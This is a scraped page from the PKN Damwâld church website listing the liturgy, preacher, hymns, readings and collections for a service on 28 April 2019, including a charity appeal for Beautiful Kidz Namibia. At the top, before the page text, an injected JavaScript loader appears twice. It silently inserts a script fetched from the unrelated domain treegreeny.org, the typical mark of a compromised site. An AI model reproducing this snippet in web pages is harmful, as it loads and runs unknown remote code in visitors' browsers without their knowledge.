;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 28 april 2019 14:00 uur - PKN Damwâld
zondag 28 april 2019
14:00 uur

Kerkdienst zondag 28 april 2019 14:00 uur

Informatie

Voorganger:Ds. K. van Marrum, Feanwâlden
Organist:Jelte Cuperus
Liturgie
Lied voor de dienst Gezang 215
intochtslied Psalm 118 : 9 en 10
Begroeting en bemoediging
Groot Glorialied Gezang 134 : 1 en 3
Gebed
We zingen: Elb 148
We lezen: Johannes 14: 27-29 en Johannes 20: 19-23
Preek .
Gebed
We zingen: Elb 501
Collecte
Slotlied Elb 79
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: St. Beautiful Kids

Stichting Beautiful Kidz Namibia
Beautiful Kidz Namibia is een Christelijke, Interkerkelijke organisatie. In een eigen dagverzorgingscentrum in de sloppenwijk "Katutura"van de hoofdstad Windhoek wordt sinds 2003 steun geboden aan kinderen in nood. In 2014 is de organisatie uitgebreid met het dagopvangcentrum in Ovitoto. Het gaat om steun aan kwetsbare kinderen die veelal het slachtoffer zijn geworden van de HIV/AIDS epidemie. Vader en/of moeder zijn aan de gevolgen van AIDS overleden en in veel gevallen zijn de kinderen zelf ook seropositief. Het met nauwelijks twee miljoen inwoners dun bevolkte land Namibia telt 200.000 weeskinderen! Er is een groot tekort aan opvang voor deze kinderen. Beautiful Kidz gaat de uitdaging aan!

Tweede collecte: Kerk
Uitganscollecte: Kerk